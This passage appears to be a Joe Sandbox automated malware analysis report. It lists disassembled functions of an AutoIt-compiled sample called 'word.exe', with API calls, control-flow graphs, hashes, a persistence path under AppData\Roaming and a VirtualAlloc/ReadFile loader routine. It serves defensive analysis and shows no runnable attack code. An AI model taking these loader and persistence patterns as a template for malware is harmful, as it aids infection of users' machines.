                                                                            Function 004523CE Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 145COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __fread_nolock$_fseek_wcscpy
                                                                            • String ID: FILE
                                                                            • API String ID: 3888824918-3121273764
                                                                            • Opcode ID: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                            • Instruction ID: c0f9aeb359a44d31a21a8716142a7f32772eb03c7b5129f1ec28ea3a2d041f76
                                                                            • Opcode Fuzzy Hash: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                            • Instruction Fuzzy Hash: D541EFB1504300BBD310EB55CC81FEB73A9AFC8718F54491EFA8457181F679E644C7AA
                                                                            Function 004101F0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 74windowregistryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetSysColorBrush.USER32 ref: 004101F9
                                                                            • LoadCursorW.USER32 ref: 00410209
                                                                            • LoadIconW.USER32 ref: 0041021F
                                                                            • LoadIconW.USER32 ref: 00410232
                                                                            • LoadIconW.USER32 ref: 00410245
                                                                            • LoadImageW.USER32 ref: 0041026A
                                                                            • RegisterClassExW.USER32 ref: 004102C6
                                                                              • Part of subcall function 004102F0: GetSysColorBrush.USER32 ref: 00410326
                                                                              • Part of subcall function 004102F0: RegisterClassExW.USER32 ref: 00410359
                                                                              • Part of subcall function 004102F0: RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                              • Part of subcall function 004102F0: InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                              • Part of subcall function 004102F0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                              • Part of subcall function 004102F0: LoadIconW.USER32 ref: 004103B1
                                                                              • Part of subcall function 004102F0: ImageList_ReplaceIcon.COMCTL32(00A5B930,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                            • String ID: #$0$PGH
                                                                            • API String ID: 423443420-3673556320
                                                                            • Opcode ID: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                            • Instruction ID: 6be78a7d21e01e6533eb66d2751721d4fd39e3055bf34e10baa21603515e7cea
                                                                            • Opcode Fuzzy Hash: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                            • Instruction Fuzzy Hash: 60216DB5A18300AFD310CF59EC84A4A7FE4FB99710F00497FF648972A0D7B599408B99
                                                                            Function 00452574 Relevance: 13.7, APIs: 9, Instructions: 171COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • _fseek.LIBCMT ref: 004525DA
                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                              • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                              • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                            • __fread_nolock.LIBCMT ref: 00452618
                                                                            • __fread_nolock.LIBCMT ref: 00452629
                                                                            • __fread_nolock.LIBCMT ref: 00452644
                                                                            • __fread_nolock.LIBCMT ref: 00452661
                                                                            • _fseek.LIBCMT ref: 0045267D
                                                                            • _malloc.LIBCMT ref: 00452689
                                                                            • _malloc.LIBCMT ref: 00452696
                                                                            • __fread_nolock.LIBCMT ref: 004526A7
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __fread_nolock$_fseek_malloc_wcscpy
                                                                            • String ID:
                                                                            • API String ID: 1911931848-0
                                                                            • Opcode ID: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                            • Instruction ID: daf5751c9f96f1f9c2235ce4d63c31b1673d17b5fb5ed0b9a51dc370059b243a
                                                                            • Opcode Fuzzy Hash: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                            • Instruction Fuzzy Hash: 47514CB1A08340AFD310DF5AD881A9BF7E9FFC8704F40492EF68887241D77AE5448B5A
                                                                            Function 0040F450 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 126COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1130 40f450-40f45c call 425210 1133 40f460-40f478 1130->1133 1133->1133 1134 40f47a-40f4a8 call 413990 call 410f70 1133->1134 1139 40f4b0-40f4d1 call 4151b0 1134->1139 1142 40f531 1139->1142 1143 40f4d3-40f4da 1139->1143 1146 40f536-40f540 1142->1146 1144 40f4dc-40f4de 1143->1144 1145 40f4fd-40f517 call 41557c 1143->1145 1147 40f4e0-40f4e2 1144->1147 1150 40f51c-40f51f 1145->1150 1149 40f4e6-40f4ed 1147->1149 1151 40f521-40f52c 1149->1151 1152 40f4ef-40f4f2 1149->1152 1150->1139 1155 40f543-40f54e 1151->1155 1156 40f52e-40f52f 1151->1156 1153 42937a-4293a0 call 41557c call 4151b0 1152->1153 1154 40f4f8-40f4fb 1152->1154 1167 4293a5-4293c3 call 4151d0 1153->1167 1154->1145 1154->1147 1157 40f550-40f553 1155->1157 1158 40f555-40f560 1155->1158 1156->1152 1157->1152 1160 429372 1158->1160 1161 40f566-40f571 1158->1161 1160->1153 1163 429361-429367 1161->1163 1164 40f577-40f57a 1161->1164 1163->1149 1166 42936d 1163->1166 1164->1152 1166->1160 1167->1146
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __fread_nolock_fseek_strcat
                                                                            • String ID: AU3!$EA06
                                                                            • API String ID: 3818483258-2658333250
                                                                            • Opcode ID: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                                                            • Instruction ID: a326fe91d6bb541f17a8cee8b09d92be642ba4032c5aa5fe266a96c6f27d1a6c
                                                                            • Opcode Fuzzy Hash: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                                                            • Instruction Fuzzy Hash: 2B416C7160C340ABC331DA24C841AEB77A59B95308F68087EF5C597683E578E44A876B
                                                                            Function 00410130 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 76COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1170 410130-410142 SHGetMalloc 1171 410148-410158 SHGetDesktopFolder 1170->1171 1172 42944f-429459 call 411691 1170->1172 1173 4101d1-4101e0 1171->1173 1174 41015a-410188 call 411691 1171->1174 1173->1172 1180 4101e6-4101ee 1173->1180 1182 4101c5-4101ce 1174->1182 1183 41018a-4101a1 SHGetPathFromIDListW 1174->1183 1182->1173 1184 4101a3-4101b1 call 411691 1183->1184 1185 4101b4-4101c0 1183->1185 1184->1185 1185->1182
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscpy$DesktopFolderFromListMallocPath
                                                                            • String ID: C:\Users\user\AppData\Roaming\word.exe
                                                                            • API String ID: 192938534-622732448
                                                                            • Opcode ID: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                            • Instruction ID: 2fe23ff91bf644c1e681f842d3c1e96d6f0f177144f23c1ad52f1bdc7517ad48
                                                                            • Opcode Fuzzy Hash: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                            • Instruction Fuzzy Hash: 822179B5604211AFC210EB64DC84DABB3ECEFC8704F14891DF94987210E739ED46CBA6
                                                                            Function 03A45778 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1188 3a45778-3a45826 call 3a43178 1191 3a4582d-3a45853 call 3a46688 CreateFileW 1188->1191 1194 3a45855 1191->1194 1195 3a4585a-3a4586a 1191->1195 1196 3a459a5-3a459a9 1194->1196 1200 3a45871-3a4588b VirtualAlloc 1195->1200 1201 3a4586c 1195->1201 1198 3a459eb-3a459ee 1196->1198 1199 3a459ab-3a459af 1196->1199 1202 3a459f1-3a459f8 1198->1202 1203 3a459b1-3a459b4 1199->1203 1204 3a459bb-3a459bf 1199->1204 1207 3a45892-3a458a9 ReadFile 1200->1207 1208 3a4588d 1200->1208 1201->1196 1209 3a45a4d-3a45a62 1202->1209 1210 3a459fa-3a45a05 1202->1210 1203->1204 1205 3a459c1-3a459cb 1204->1205 1206 3a459cf-3a459d3 1204->1206 1205->1206 1213 3a459d5-3a459df 1206->1213 1214 3a459e3 1206->1214 1215 3a458b0-3a458f0 VirtualAlloc 1207->1215 1216 3a458ab 1207->1216 1208->1196 1211 3a45a64-3a45a6f VirtualFree 1209->1211 1212 3a45a72-3a45a7a 1209->1212 1217 3a45a07 1210->1217 1218 3a45a09-3a45a15 1210->1218 1211->1212 1213->1214 1214->1198 1219 3a458f7-3a45912 call 3a468d8 1215->1219 1220 3a458f2 1215->1220 1216->1196 1217->1209 1221 3a45a17-3a45a27 1218->1221 1222 3a45a29-3a45a35 1218->1222 1228 3a4591d-3a45927 1219->1228 1220->1196 1224 3a45a4b 1221->1224 1225 3a45a37-3a45a40 1222->1225 1226 3a45a42-3a45a48 1222->1226 1224->1202 1225->1224 1226->1224 1229 3a45929-3a45958 call 3a468d8 1228->1229 1230 3a4595a-3a4596e call 3a466e8 1228->1230 1229->1228 1236 3a45970 1230->1236 1237 3a45972-3a45976 1230->1237 1236->1196 1238 3a45982-3a45986 1237->1238 1239 3a45978-3a4597c CloseHandle 1237->1239 1240 3a45996-3a4599f 1238->1240 1241 3a45988-3a45993 VirtualFree 1238->1241 1239->1238 1240->1191 1240->1196 1241->1240
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03A45849
                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03A45A6F
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429781740.0000000003A43000.00000040.00000020.00020000.00000000.sdmp, Offset: 03A43000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3a43000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFileFreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 204039940-0
                                                                            • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                            • Instruction ID: 85bd6e612ebfdff27f4d909da6ee13d0ff17d62f3f9cb48c1165475d2d2aad40
                                                                            • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                            • Instruction Fuzzy Hash: C8A10874E00209EBDF14CFA4C998BEEB7B5FF89314F24819AE505BB281D7759A40CB64
                                                                            Function 00414F10 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1242 414f10-414f2c 1243 414f4f 1242->1243 1244 414f2e-414f31 1242->1244 1246 414f51-414f55 1243->1246 1244->1243 1245 414f33-414f35 1244->1245 1247 414f37-414f46 call 417f23 1245->1247 1248 414f56-414f5b 1245->1248 1260 414f47-414f4c call 417ebb 1247->1260 1249 414f6a-414f6d 1248->1249 1250 414f5d-414f68 1248->1250 1253 414f7a-414f7c 1249->1253 1254 414f6f-414f77 call 4131f0 1249->1254 1250->1249 1252 414f8b-414f9e 1250->1252 1258 414fa0-414fa6 1252->1258 1259 414fa8 1252->1259 1253->1247 1257 414f7e-414f89 1253->1257 1254->1253 1257->1247 1257->1252 1262 414faf-414fb1 1258->1262 1259->1262 1260->1243 1264 4150a1-4150a4 1262->1264 1265 414fb7-414fbe 1262->1265 1264->1246 1267 414fc0-414fc5 1265->1267 1268 415004-415007 1265->1268 1267->1268 1271 414fc7 1267->1271 1269 415071-415072 call 41e6b1 1268->1269 1270 415009-41500d 1268->1270 1277 415077-41507b 1269->1277 1273 41500f-415018 1270->1273 1274 41502e-415035 1270->1274 1275 415102 1271->1275 1276 414fcd-414fd1 1271->1276 1278 415023-415028 1273->1278 1279 41501a-415021 1273->1279 1281 415037 1274->1281 1282 415039-41503c 1274->1282 1280 415106-41510f 1275->1280 1283 414fd3 1276->1283 1284 414fd5-414fd8 1276->1284 1277->1280 1287 415081-415085 1277->1287 1288 41502a-41502c 1278->1288 1279->1288 1280->1246 1281->1282 1289 415042-41504e call 41453a call 41ed9e 1282->1289 1290 4150d5-4150d9 1282->1290 1283->1284 1285 4150a9-4150af 1284->1285 1286 414fde-414fff call 41ee9b 1284->1286 1295 4150b1-4150bd call 4131f0 1285->1295 1296 4150c0-4150d0 call 417f23 1285->1296 1302 415099-41509b 1286->1302 1287->1290 1294 415087-415096 1287->1294 1288->1282 1310 415053-415058 1289->1310 1292 4150eb-4150fd call 417f23 1290->1292 1293 4150db-4150e8 call 4131f0 1290->1293 1292->1260 1293->1292 1294->1302 1295->1296 1296->1260 1302->1264 1302->1265 1311 415114-415118 1310->1311 1312 41505e-415061 1310->1312 1311->1280 1312->1275 1313 415067-41506f 1312->1313 1313->1302
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                            • String ID:
                                                                            • API String ID: 3886058894-0
                                                                            • Opcode ID: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                            • Instruction ID: 085ef53bf2cba992f8731f00f2d52beda6aca72a1b803249d76dffc069a60243
                                                                            • Opcode Fuzzy Hash: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                            • Instruction Fuzzy Hash: CA510830900604EFCB208FA9C8445DFBBB5EFC5324F24825BF82596290D7799ED2CB99
                                                                            Function 00401BE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90windowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1314 401be0-401bf5 1315 401bfb-401c12 call 4013a0 1314->1315 1316 401cde-401ce3 1314->1316 1319 42a9a0-42a9b0 LoadStringW 1315->1319 1320 401c18-401c34 call 4021e0 1315->1320 1322 42a9bb-42a9c8 call 40df50 1319->1322 1325 401c3a-401c3e 1320->1325 1326 42a9cd-42a9ea call 40d3b0 call 437a81 1320->1326 1330 401c53-401cd9 call 4131f0 call 41326a call 411691 Shell_NotifyIconW call 402620 1322->1330 1325->1322 1328 401c44-401c4e call 40d3b0 1325->1328 1326->1330 1338 42a9f0-42aa04 call 40d3b0 call 437a81 1326->1338 1328->1330 1330->1316
                                                                            APIs
                                                                            • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042A9B0
                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                            • _memset.LIBCMT ref: 00401C62
                                                                            • _wcsncpy.LIBCMT ref: 00401CA1
                                                                            • _wcscpy.LIBCMT ref: 00401CBD
                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: IconLoadNotifyShell_String_memset_wcscpy_wcslen_wcsncpy
                                                                            • String ID: Line:
                                                                            • API String ID: 1620655955-1585850449
                                                                            • Opcode ID: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                            • Instruction ID: a4e7cf3abc31881c2b93aaae0beefbbd48c64772eea77d32b53e92a0700a02c6
                                                                            • Opcode Fuzzy Hash: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                            • Instruction Fuzzy Hash: 7431D47151C301ABD324EB11DC41BDB77E8AF94314F04493FF989521A1DB78AA49C79B
                                                                            Function 004103E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1347 4103e0-410461 CreateWindowExW * 2 ShowWindow * 2
                                                                            APIs
                                                                            • CreateWindowExW.USER32 ref: 00410415
                                                                            • CreateWindowExW.USER32 ref: 0041043E
                                                                            • ShowWindow.USER32(?,00000000), ref: 00410454
                                                                            • ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CreateShow
                                                                            • String ID: AutoIt v3$edit
                                                                            • API String ID: 1584632944-3779509399
                                                                            • Opcode ID: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                            • Instruction ID: daa3d4afae2654ee996124117597f48fa5c574a0ac4b96d00400a8ba476d7f73
                                                                            • Opcode Fuzzy Hash: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                            • Instruction Fuzzy Hash: F3F0A975BE4310BAF6609754AC43F592B59A765F00F3445ABB700BF1D0D6E478408B9C
                                                                            Function 03A45528 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1348 3a45528-3a45674 call 3a43178 call 3a45418 CreateFileW 1355 3a45676 1348->1355 1356 3a4567b-3a4568b 1348->1356 1357 3a4572b-3a45730 1355->1357 1359 3a45692-3a456ac VirtualAlloc 1356->1359 1360 3a4568d 1356->1360 1361 3a456b0-3a456c7 ReadFile 1359->1361 1362 3a456ae 1359->1362 1360->1357 1363 3a456c9 1361->1363 1364 3a456cb-3a45705 call 3a45458 call 3a44418 1361->1364 1362->1357 1363->1357 1369 3a45707-3a4571c call 3a454a8 1364->1369 1370 3a45721-3a45729 ExitProcess 1364->1370 1369->1370 1370->1357
                                                                            APIs
                                                                              • Part of subcall function 03A45418: Sleep.KERNELBASE(000001F4), ref: 03A45429
                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03A4566A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429781740.0000000003A43000.00000040.00000020.00020000.00000000.sdmp, Offset: 03A43000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3a43000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFileSleep
                                                                            • String ID: 12NE3S0D3QVD9
                                                                            • API String ID: 2694422964-394935102
                                                                            • Opcode ID: 43d47db788125fa54371ce7b4fb8163c5f14ada0bddc155299f6d8f1af0a0ef8
                                                                            • Instruction ID: f80de63eace3f8b9a120ab24883a95d65956b648840451b5878302709effefa7
                                                                            • Opcode Fuzzy Hash: 43d47db788125fa54371ce7b4fb8163c5f14ada0bddc155299f6d8f1af0a0ef8
                                                                            • Instruction Fuzzy Hash: 5B518E30E14248DBEF11DBE4D954BEEBB79AF59300F00459AE208BB2C0D7B91A45CB65
                                                                            Function 00413A88 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1372 413a88-413a99 call 41718c 1375 413b10-413b15 call 4171d1 1372->1375 1376 413a9b-413aa2 1372->1376 1377 413aa4-413abc call 418407 call 419f6d 1376->1377 1378 413ae7 1376->1378 1390 413ac7-413ad7 call 413ade 1377->1390 1391 413abe-413ac6 call 419f9d 1377->1391 1380 413ae8-413af8 HeapFree 1378->1380 1380->1375 1383 413afa-413b0f call 417f23 GetLastError call 417ee1 1380->1383 1383->1375 1390->1375 1397 413ad9-413adc 1390->1397 1391->1390 1397->1380
                                                                            APIs
                                                                            • __lock.LIBCMT ref: 00413AA6
                                                                              • Part of subcall function 00418407: __mtinitlocknum.LIBCMT ref: 0041841D
                                                                              • Part of subcall function 00418407: __amsg_exit.LIBCMT ref: 00418429
                                                                              • Part of subcall function 00418407: EnterCriticalSection.KERNEL32(?,?,?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001), ref: 00418431
                                                                            • ___sbh_find_block.LIBCMT ref: 00413AB1
                                                                            • ___sbh_free_block.LIBCMT ref: 00413AC0
                                                                            • HeapFree.KERNEL32(00000000,00411739,0048C758), ref: 00413AF0
                                                                            • GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                            • String ID:
                                                                            • API String ID: 2714421763-0
                                                                            • Opcode ID: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                            • Instruction ID: 54fb22c17cbd059cfb8714ef359fce415cc636064f476ff80f42ef981757bf49
                                                                            • Opcode Fuzzy Hash: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                            • Instruction Fuzzy Hash: 7401A731A08301BADF206F71AC09BDF3B64AF00759F10052FF544A6182DB7D9AC19B9C
                                                                            Function 0040F5E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
